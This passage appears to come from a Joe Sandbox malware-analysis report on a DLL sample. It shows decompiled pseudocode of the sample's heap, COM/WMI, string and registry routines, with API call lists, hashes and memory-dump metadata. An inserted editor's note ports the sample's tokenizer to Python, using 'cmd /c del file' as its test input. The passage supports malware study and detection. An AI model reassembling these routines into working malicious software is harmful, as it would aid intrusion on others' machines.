                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Trim
                • String ID:
                • API String ID: 3043112668-0
                • Opcode ID: cb0ed091b20c7d155b1534a1babeb48303765e270fdb5d52500a383e5f0fe101
                • Instruction ID: 5f8c2d5d86cbb955ba0716a834138ea2a0c1bed2de606867d4c8678bb9e69d16
                • Opcode Fuzzy Hash: cb0ed091b20c7d155b1534a1babeb48303765e270fdb5d52500a383e5f0fe101
                • Instruction Fuzzy Hash: 1D019E72380345EFE7208A7B8C45F677E9DEB8B690F1C0021AB46CB24AD934C902E760
                Uniqueness

                Uniqueness Score: -1.00%
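                The decompiled routine E01C11590 above is the sample's command-line tokenizer: one pass counts 0x20 separators to size the pointer array, a second pass overwrites each 0x20 with NUL and skips any run of further spaces or tabs before the next token. The port below is an added illustration by the editor, not code from the sample or from Joe Sandbox; it makes the quirk visible that only a space starts a new token while a tab is merely skipped after a space. The character set passed to StrTrimA (at 0x1c192a4) is not recoverable from the dump, so trimming " \t" is an assumption.

```python
"""Python port of the space-tokenizer decompiled as E01C11590 (added illustration).

Behaviour reproduced from the decompiled listing:
  pass 1: StrChrA loop counts 0x20 bytes -> (spaces + 1) pointer slots are allocated
  pass 2: each 0x20 is overwritten with NUL; the do/while then advances past any
          following 0x20 / 0x09 bytes; the token start is stored; loop ends when
          StrChrA returns NULL.
"""


def e01c11590_split(cmdline: bytes, trim_chars: bytes = b" \t"):
    """Return (argv, slots): argv as the routine fills it, slots as it allocates."""
    # Pass 1: one increment per space found, starting from 1 (_t20 = 1).
    slots = 1 + cmdline.count(b" ")

    # StrTrimA(_t16, 0x1c192a4): the trim charset is ASSUMED to be " \t".
    buf = bytearray(cmdline.strip(trim_chars)) + b"\x00"

    argv = []
    pos = 0
    while True:
        start = pos
        sp = buf.find(b" ", start)          # StrChrA(_t16, 0x20)
        if sp == -1:
            nxt = None                      # _t14 == NULL ends the loop
        else:
            buf[sp] = 0                     # *_t14 = 0: terminate token in place
            nxt = sp + 1                    # do { _t14++ } while (*_t14 == ' ' || *_t14 == '\t')
            while buf[nxt] in (0x20, 0x09):
                nxt += 1
        # *(array + idx*4) = _t16: store the current token start
        argv.append(bytes(buf[start:buf.index(0, start)]))
        if nxt is None:
            break
        pos = nxt                           # _t16 = _t14
    return argv, slots


if __name__ == "__main__":
    # Constructed sample input (not from the report): double spaces and an embedded tab.
    argv, slots = e01c11590_split(b"cmd  /c\tdel  file")
    print(slots, argv)                      # 5 [b'cmd', b'/c\tdel', b'file']
```

Note that the array is sized from the raw space count, so with repeated separators more slots are allocated than tokens stored, and no NUL terminator is written; a caller that walks the array has to rely on the allocator zero-filling the surplus slots.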

                APIs
                • lstrlen.KERNEL32(046ED514,00000000,?,?,?,046C6E33,00000000,?,?,046ED514,?,046EA590,00000018,046CB772,00000000,00000002), ref: 046C9FCC
                • VirtualProtect.KERNELBASE(046ED514,00000004,00000040,00000000,00000000,00000000,?,?,?,046C6E33,00000000,?,?,046ED514,?,046EA590), ref: 046C9FE6
                • VirtualProtect.KERNELBASE(046ED514,00000004,00000000,00000000,?,?,?,046C6E33,00000000,?,?,046ED514,?,046EA590,00000018,046CB772), ref: 046CA019
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ProtectVirtual$lstrlen
                • String ID:
                • API String ID: 386137988-0
                • Opcode ID: 7590615174a97100e117a592213a6b290b6a546fff43133be02a6ae56b4a2e85
                • Instruction ID: 87aef34b072cb51cb996ff9c985e7542cdd33c75ca5ae7f76b973e8c93dc469a
                • Opcode Fuzzy Hash: 7590615174a97100e117a592213a6b290b6a546fff43133be02a6ae56b4a2e85
                • Instruction Fuzzy Hash: 31113075900208EFEB11CF85C485FEEBFB8EF15358F108049EA049B201E379EA84DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E01C16096(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				intOrPtr _v36;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v60;
                				char _v64;
                				long _t14;
                				intOrPtr _t18;
                				intOrPtr _t19;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				long _t28;
                
                				_t27 = __edi;
                				_t26 = _a8;
                				_t14 = E01C12D2F(_a4, _t26, __edi); // executed
                				_t28 = _t14;
                				if(_t28 != 0) {
                					memset( &_v60, 0, 0x38);
                					_t18 =  *0x1c1a2d8; // 0x55d5a8
                					_t28 = 0;
                					_v64 = 0x3c;
                					if(_a12 == 0) {
                						_t7 = _t18 + 0x1c1b4e8; // 0x70006f
                						_t19 = _t7;
                					} else {
                						_t6 = _t18 + 0x1c1b8f0; // 0x750072
                						_t19 = _t6;
                					}
                					_v52 = _t19;
                					_push(_t28);
                					_v48 = _a4;
                					_v44 = _t26;
                					_v36 = _t27;
                					E01C16CFD();
                					_push( &_v64);
                					if( *0x1c1a100() == 0) {
                						_t28 = GetLastError();
                					}
                					_push(1);
                					E01C16CFD();
                				}
                				return _t28;
                			}

                Statement address column (flattened by extraction; the function body spans 0x01c16096 .. 0x01c16119)

                APIs
                  • Part of subcall function 01C12D2F: SysAllocString.OLEAUT32(00000000), ref: 01C12D8B
                  • Part of subcall function 01C12D2F: SysAllocString.OLEAUT32(0070006F), ref: 01C12D9F
                  • Part of subcall function 01C12D2F: SysAllocString.OLEAUT32(00000000), ref: 01C12DB1
                  • Part of subcall function 01C12D2F: SysFreeString.OLEAUT32(00000000), ref: 01C12E15
                • memset.NTDLL ref: 01C160B9
                • GetLastError.KERNEL32 ref: 01C16105
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$Alloc$ErrorFreeLastmemset
                • String ID: <
                • API String ID: 1330562889-4251816714
                • Opcode ID: 0b178ff6a6e102a0943adb9a59cfb2ebc758e6f3db588792f6f172c0a98c269a
                • Instruction ID: 7c608667203ed18d857cc5df78fe457f24eb4d45e3986e41b9f4c55df2ee9131
                • Opcode Fuzzy Hash: 0b178ff6a6e102a0943adb9a59cfb2ebc758e6f3db588792f6f172c0a98c269a
                • Instruction Fuzzy Hash: 35018071D80228EFDB10EFA9D884FCE7BF8BB1A650F404166F904E7205D7B0D904ABA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                • RegOpenKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD105
                • lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CreateOpenlstrlen
                • String ID:
                • API String ID: 2865187142-0
                • Opcode ID: d6e797d303fae10f2e4e1a876a76791d514446ecec5f249bfb8f422cbfee8031
                • Instruction ID: 88bad8ee819b91ddcd3d1e424ad79ef61b30daaa2ccc3cf4117616572e058f04
                • Opcode Fuzzy Hash: d6e797d303fae10f2e4e1a876a76791d514446ecec5f249bfb8f422cbfee8031
                • Instruction Fuzzy Hash: C5F03676100208BFEB119F91DC85FAB7BBCEB457A4F10801AFD459A240F6B4BA80C761
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetEvent.KERNEL32(0000043C,046E3A8C), ref: 046CE02E
                  • Part of subcall function 046C609C: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C60C5
                  • Part of subcall function 046C609C: RtlDeleteCriticalSection.NTDLL(046EE460), ref: 046C60F8
                  • Part of subcall function 046C609C: RtlDeleteCriticalSection.NTDLL(046EE480), ref: 046C60FF
                  • Part of subcall function 046C609C: ReleaseMutex.KERNEL32(00000448,00000000,?,?,?,046CE039), ref: 046C6128
                  • Part of subcall function 046C609C: CloseHandle.KERNEL32(?,?,046CE039), ref: 046C6134
                  • Part of subcall function 046C609C: ResetEvent.KERNEL32(00000000,00000000,?,?,?,046CE039), ref: 046C6140
                  • Part of subcall function 046C609C: CloseHandle.KERNEL32(?,?,046CE039), ref: 046C614C
                  • Part of subcall function 046C609C: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C6152
                  • Part of subcall function 046C609C: SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C6166
                  • Part of subcall function 046C609C: HeapFree.KERNEL32(00000000,00000000,?,?,046CE039), ref: 046C618A
                  • Part of subcall function 046C609C: RtlRemoveVectoredExceptionHandler.NTDLL(01333FC8), ref: 046C61C0
                  • Part of subcall function 046C609C: SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C61DC
                • CloseHandle.KERNEL32(0000043C), ref: 046CE043
                • HeapDestroy.KERNELBASE(048A0000), ref: 046CE053
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                • String ID:
                • API String ID: 2773679374-0
                • Opcode ID: 4f1b6b7bc484d466d8e50d65552d20e3385ebf0fdee1f1ac1da2ffab5bdebf06
                • Instruction ID: d797dc56aa795d66d78c57f5fafb08f9495e64c5f0895427bf4d32ad24ee51a7
                • Opcode Fuzzy Hash: 4f1b6b7bc484d466d8e50d65552d20e3385ebf0fdee1f1ac1da2ffab5bdebf06
                • Instruction Fuzzy Hash: 5AE062747016019BEB60AF76E94CB2637E8EB546413482828B515DB590FB2EEC509A74
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C11A55(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                				int _v12;
                				signed int _v16;
                				void* _v20;
                				signed char _v36;
                				void* _t24;
                				intOrPtr _t27;
                				void* _t35;
                				signed int _t38;
                				signed char* _t46;
                				int _t53;
                				void* _t55;
                				void* _t56;
                				void* _t57;
                
                				_v16 = _v16 & 0x00000000;
                				_t46 = _a4;
                				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                				_v12 = 0x110;
                				_t24 = E01C12114(_t53);
                				_a4 = _t24;
                				if(_t24 != 0) {
                					memcpy(_t24,  *0x1c1a330, 0x110);
                					_t27 =  *0x1c1a334; // 0x0
                					_t57 = _t56 + 0xc;
                					if(_t27 != 0) {
                						_t51 = _a4;
                						E01C14B70(0x110, _a4, _t27, 0);
                					}
                					if(E01C16D8B( &_v36) != 0) {
                						_t35 = E01C178F2(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                						if(_t35 == 0) {
                							_t55 = _v20;
                							_v36 =  *_t46;
                							_t38 = E01C124F7(_t55, _a8, _t51, _t46, _a12); // executed
                							_v16 = _t38;
                							 *(_t55 + 4) = _v36;
                							_t20 =  &(_t46[4]); // 0xbf0845c7
                							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
                							_t57 = _t57 + 0xc;
                							E01C12C11(_t55);
                						}
                					}
                					memset(_a4, 0, _t53);
                					E01C12C11(_a4);
                				}
                				return _v16;
                			}

                Statement address column (flattened by extraction; the function body spans 0x01c11a5b .. 0x01c11b2b)

                APIs
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • memcpy.NTDLL(00000000,00000110,?,?,?,?,01C14F92,?,01C17307,01C17307,?), ref: 01C11A8B
                • memset.NTDLL ref: 01C11B00
                • memset.NTDLL ref: 01C11B14
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 1529149438-0
                • Opcode ID: 5098544d077398dd307338594893f8c041d0f6d5ae96116c12c16fef69c910ea
                • Instruction ID: 50c1eed3b17f17cbe7566b2b3b9482878bd1ca8fa1a43d9cb750d14fd0aad2e5
                • Opcode Fuzzy Hash: 5098544d077398dd307338594893f8c041d0f6d5ae96116c12c16fef69c910ea
                • Instruction Fuzzy Hash: 5F217F75A40219EBDF11AFA9CC41FEE7BB8EF5A600F044055F904E7245E738D600EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E01C13035(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                				char _v8;
                				void* _t14;
                				intOrPtr _t17;
                				void* _t20;
                				void* _t26;
                
                				_push(__ecx);
                				if(_a4 == 0 || __eax == 0) {
                					_t26 = 0x57;
                				} else {
                					_t14 = E01C1134A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                					_t26 = _t14;
                					if(_t26 == 0) {
                						_t17 =  *0x1c1a2d8; // 0x55d5a8
                						_t9 = _t17 + 0x1c1ba3c; // 0x444f4340
                						_t20 = E01C12638( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                						_t26 = _t20;
                						RtlFreeHeap( *0x1c1a290, 0, _a4); // executed
                					}
                				}
                				return _t26;
                			}

                Statement address column (flattened by extraction; the function body spans 0x01c13038 .. 0x01c1309a)

                APIs
                  • Part of subcall function 01C1134A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01C11362
                  • Part of subcall function 01C12638: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 01C1266C
                  • Part of subcall function 01C12638: StrStrA.SHLWAPI(00000000,?), ref: 01C12679
                  • Part of subcall function 01C12638: RtlAllocateHeap.NTDLL(00000000,?), ref: 01C12698
                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,01C120B3), ref: 01C1308B
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freelstrlen
                • String ID: Ut
                • API String ID: 2220322926-8415677
                • Opcode ID: 70acc0af0617894ae3af09d78bb9ca5111350bc4034682deec2b0808c401dbf3
                • Instruction ID: 2966b1b2e09a35e06aa497558a1da921454279a7c1b21c37cc82db59c0190a01
                • Opcode Fuzzy Hash: 70acc0af0617894ae3af09d78bb9ca5111350bc4034682deec2b0808c401dbf3
                • Instruction Fuzzy Hash: 6301AD36180108FFDB228F59CC04EDA7BE9FB55264F108024FA0E86164E731EA44EB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C12C11(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x1c1a290, 0, _a4); // executed
                				return _t2;
                			}

                Statement address column (flattened by extraction; the function body spans 0x01c12c1d .. 0x01c12c23)

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: 398f49cf943a8e2cfc61b87a8539299b3d900169c4f148c13390ef9ee00ab420
                • Instruction ID: cd90ccc37b240c98fa930fc4870300a84a25a597e3e2ded63090c9f79508ab40
                • Opcode Fuzzy Hash: 398f49cf943a8e2cfc61b87a8539299b3d900169c4f148c13390ef9ee00ab420
                • Instruction Fuzzy Hash: DDB01231084110ABCA224B00DD08F457B22B775B00F004010B20E40068C233C420EB09
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E01C163FF(intOrPtr _a4) {
                				void* _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				void* _v28;
                				char _v32;
                				intOrPtr _v40;
                				void* _v46;
                				short _v48;
                				intOrPtr _t49;
                				void* _t51;
                				intOrPtr* _t53;
                				intOrPtr _t56;
                				void* _t58;
                				intOrPtr* _t59;
                				intOrPtr* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				intOrPtr* _t67;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr* _t73;
                				intOrPtr _t76;
                				intOrPtr* _t79;
                				short _t81;
                				char* _t97;
                				intOrPtr _t99;
                				void* _t105;
                				void* _t107;
                				intOrPtr _t111;
                
                				_t81 = 0;
                				_v48 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				_t49 =  *0x1c1a2d8; // 0x55d5a8
                				_t4 = _t49 + 0x1c1b44c; // 0x21789f4
                				_t5 = _t49 + 0x1c1b43c; // 0x9ba05972
                				_t51 =  *0x1c1a140(_t5, 0, 4, _t4,  &_v20); // executed
                				_t105 = _t51;
                				if(_t105 >= 0) {
                					_t53 = _v20;
                					_push( &_v12);
                					_push(1);
                					_push( &_v32);
                					_push(8);
                					_t97 =  &_v48;
                					_push(_t97);
                					_push(_t97);
                					_push(_t53); // executed
                					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                						_t56 =  *0x1c1a2d8; // 0x55d5a8
                						_t30 = _t56 + 0x1c1b42c; // 0x21789d4
                						_t31 = _t56 + 0x1c1b45c; // 0x4c96be40
                						_t58 =  *0x1c1a114(_v12, _t31, _t30,  &_v24); // executed
                						_t105 = _t58;
                						_t59 = _v12;
                						 *((intOrPtr*)( *_t59 + 8))(_t59);
                						goto L11;
                					} else {
                						_t71 = _v20;
                						_v16 = 0;
                						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                						if(_t105 >= 0) {
                							_t111 = _v16;
                							if(_t111 == 0) {
                								_t105 = 0x80004005;
                								goto L11;
                							} else {
                								if(_t111 <= 0) {
                									L11:
                									if(_t105 >= 0) {
                										goto L12;
                									}
                								} else {
                									do {
                										_t73 = _v20;
                										_v48 = 3;
                										_v40 = _t81;
                										_t107 = _t107 - 0x10;
                										asm("movsd");
                										asm("movsd");
                										asm("movsd");
                										asm("movsd");
                										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                										if(_t105 < 0) {
                											goto L7;
                										} else {
                											_t76 =  *0x1c1a2d8; // 0x55d5a8
                											_t23 = _t76 + 0x1c1b42c; // 0x21789d4
                											_t24 = _t76 + 0x1c1b45c; // 0x4c96be40
                											_t105 =  *0x1c1a114(_v12, _t24, _t23,  &_v24);
                											_t79 = _v12;
                											 *((intOrPtr*)( *_t79 + 8))(_t79);
                											if(_t105 >= 0) {
                												L12:
                												_t63 = _v24;
                												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                												if(_t105 >= 0) {
                													_t99 =  *0x1c1a2d8; // 0x55d5a8
                													_t67 = _v28;
                													_t40 = _t99 + 0x1c1b41c; // 0x214e3
                													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                													_t69 = _v28;
                													 *((intOrPtr*)( *_t69 + 8))(_t69);
                												}
                												_t65 = _v24;
                												 *((intOrPtr*)( *_t65 + 8))(_t65);
                											} else {
                												goto L7;
                											}
                										}
                										goto L15;
                										L7:
                										_t81 = _t81 + 1;
                									} while (_t81 < _v16);
                									goto L11;
                								}
                							}
                						}
                					}
                					L15:
                					_t61 = _v20;
                					 *((intOrPtr*)( *_t61 + 8))(_t61);
                				}
                				return _t105;
                			}

                Statement address column (flattened by extraction; the function body spans 0x01c1640a .. 0x01c1656c)

                APIs
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,021789D4,01C12D5F,?,?,?,?,?,?,?,?,?,?,?,01C12D5F), ref: 01C164CB
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,021789D4,01C12D5F,?,?,?,?,?,?,?,01C12D5F,00000000,00000000,00000000,006D0063), ref: 01C16509
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: QueryServiceUnknown_
                • String ID:
                • API String ID: 2042360610-0
                • Opcode ID: a8c60d7230d3e282de8fd9a0213b5b9db3c19c8088027816b433c238b8af2930
                • Instruction ID: ce89752cfd7138160ca9c70e1b9f519080aabdc2bc99c0c6818e89792957efa8
                • Opcode Fuzzy Hash: a8c60d7230d3e282de8fd9a0213b5b9db3c19c8088027816b433c238b8af2930
                • Instruction Fuzzy Hash: 22513C76940129EFCB00CFE8C888DAEB7B9FF4A714B048558EA05EB215D671ED05DF60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E01C151C7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                				void* _v8;
                				void* __esi;
                				intOrPtr* _t35;
                				void* _t40;
                				intOrPtr* _t41;
                				intOrPtr* _t43;
                				intOrPtr* _t45;
                				intOrPtr* _t50;
                				intOrPtr* _t52;
                				void* _t54;
                				intOrPtr* _t55;
                				intOrPtr* _t57;
                				intOrPtr* _t61;
                				intOrPtr* _t65;
                				intOrPtr _t68;
                				void* _t72;
                				void* _t75;
                				void* _t76;
                
                				_t55 = _a4;
                				_t35 =  *((intOrPtr*)(_t55 + 4));
                				_a4 = 0;
                				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                				if(_t76 < 0) {
                					L18:
                					return _t76;
                				}
                				_t40 = E01C12C2D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                				_t76 = _t40;
                				if(_t76 >= 0) {
                					_t61 = _a28;
                					if(_t61 != 0 &&  *_t61 != 0) {
                						_t52 = _v8;
                						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                					}
                					if(_t76 >= 0) {
                						_t43 =  *_t55;
                						_t68 =  *0x1c1a2d8; // 0x55d5a8
                						_t20 = _t68 + 0x1c1b1fc; // 0x740053
                						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                						if(_t76 >= 0) {
                							_t76 = E01C16AEB(_a4);
                							if(_t76 >= 0) {
                								_t65 = _a28;
                								if(_t65 != 0 &&  *_t65 == 0) {
                									_t50 = _a4;
                									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                								}
                							}
                						}
                						_t45 = _a4;
                						if(_t45 != 0) {
                							 *((intOrPtr*)( *_t45 + 8))(_t45);
                						}
                						_t57 = __imp__#6;
                						if(_a20 != 0) {
                							 *_t57(_a20);
                						}
                						if(_a12 != 0) {
                							 *_t57(_a12);
                						}
                					}
                				}
                				_t41 = _v8;
                				 *((intOrPtr*)( *_t41 + 8))(_t41);
                				goto L18;
                			}

                APIs
                  • Part of subcall function 01C12C2D: SysAllocString.OLEAUT32(80000002), ref: 01C12C84
                  • Part of subcall function 01C12C2D: SysFreeString.OLEAUT32(00000000), ref: 01C12CE9
                • SysFreeString.OLEAUT32(?), ref: 01C152A6
                • SysFreeString.OLEAUT32(01C11C26), ref: 01C152B0
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 0735b7167c4ecaab9bcd6e20a9d87f1b796ed0269f98dfc9e3285e43adffbdba
                • Instruction ID: e3d73cb44074530cee4c4071894b16b68e38abb5938c3ff3be412ab288567606
                • Opcode Fuzzy Hash: 0735b7167c4ecaab9bcd6e20a9d87f1b796ed0269f98dfc9e3285e43adffbdba
                • Instruction Fuzzy Hash: 7F313872900119EFCB21DF98C888CDBBBB9FBCA6407148658F9069B214D271DD91EBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CD0E6: RegCreateKeyA.ADVAPI32(80000001,04C9B7F0,?), ref: 046CD0FB
                  • Part of subcall function 046CD0E6: lstrlen.KERNEL32(04C9B7F0,00000000,00000000,046ED06E,?,?,?,046C902F,00000001,?), ref: 046CD124
                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,046ED068,?,00000001,?,?,046ED06E,?,?,?,?), ref: 046C9050
                • RegCloseKey.ADVAPI32(?,?,046ED06E,?,?,?,?), ref: 046C9099
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseCreateQueryValuelstrlen
                • String ID:
                • API String ID: 971780412-0
                • Opcode ID: aa89bc3b561ba19684fcffd57c97a9776beeb21175397b82beb20422fe3c1902
                • Instruction ID: 82780dba31abf0fac64c78a5ce0342cb627019d8439d853b47ee71306ce54bff
                • Opcode Fuzzy Hash: aa89bc3b561ba19684fcffd57c97a9776beeb21175397b82beb20422fe3c1902
                • Instruction Fuzzy Hash: 6F3151B1E00219EFDB21DF96E8409AEBBF8EB04750F14506EE514AB240F7756E85CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E01C13318(intOrPtr* __eax, intOrPtr _a4) {
                				void* _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr* _t22;
                				void* _t23;
                				intOrPtr* _t24;
                				intOrPtr* _t26;
                				intOrPtr* _t28;
                				intOrPtr* _t30;
                				void* _t31;
                				intOrPtr* _t32;
                				intOrPtr _t42;
                				intOrPtr _t45;
                				intOrPtr _t48;
                				void* _t51;
                
                				_push( &_v16);
                				_t42 =  *0x1c1a2d8; // 0x55d5a8
                				_t2 = _t42 + 0x1c1b46c; // 0x20400
                				_push(0);
                				_push(__eax); // executed
                				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                				if(_t51 >= 0) {
                					_t22 = _v16;
                					_t45 =  *0x1c1a2d8; // 0x55d5a8
                					_t6 = _t45 + 0x1c1b48c; // 0xe7a1af80
                					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
